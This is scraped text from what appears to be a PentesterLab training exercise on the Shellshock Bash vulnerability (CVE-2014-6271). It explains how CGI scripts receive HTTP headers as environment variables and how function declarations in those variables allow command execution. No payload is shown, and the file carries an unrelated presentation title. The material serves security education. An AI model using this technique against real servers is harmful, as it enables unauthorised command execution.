Unraveling Hypertext_ Analyzing Postmodern Elements in Literature.pptx
Shellshock
1. CVE-2014-6271/Shellshock
This exercise covers the exploitation of a Bash vulnerability through a CGI.
FREE
EASY
Dif�culty
4082
Completed this exercise
Online labs details Video
Introduction
This course details the exploitation of the vulnerability CVE-2014-6271. This vulnerability impacts the Bourne
Again Shell "Bash". Bash is not usually available through a web application but can be indirectly exposed
through a Common Gateway Interface "CGI".
Fingerprinting
By visiting the application with a proxy (Burp Suite or OWASP Zap), we can detect that multiple URL are
accessed when the page is loaded:
To exploit "Shellshock", we need to �nd a way to "talk" to Bash. This implies �nding a CGI that will use Bash.
CGIs commonly use Python or Perl but it's not uncommon to �nd (on old servers), CGI written in Shell or even C.
How CGIs work?
When you call a CGI, the web server (Apache here) will start a new process and run the CGI. Here it will start a
Bash process and run the CGI script.
Apache needs to pass information to the CGI script. To do so, it uses environment variables. Environment
variables are available inside the CGI script. It allows Apache to easily pass every headers (amongst other
information) to the CGI. If you have a HTTP header named Blah in your request, you will have an environment
variable named HTTP_BLAH available in your CGI.
The vulnerability
Here, we are going to focus on the �rst version of the vulnerability but many more vulnerabilities in the same
subpart of Bash have been found since: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186,
CVE-2014-7187...
The source of the issue is that Bash can have internal function declaration in its environment variable. The �rst
version of the vulnerability is related to the ability to run arbitrary commands after a function declaration.
You can quickly test this by replacing the call to `uptime` by a call to `env` in the CGI. Then if you call
this script with arbitrary header, you should see them in the page.
PentesterLab: Learn Web App Pentesting! https://pentesterlab.com/exercises/cve-2014-62...
1 of 2 2020-04-02 12:11
2. PentesterLab: Learn Web App Pentesting! https://pentesterlab.com/exercises/cve-2014-62...
2 of 2 2020-04-02 12:11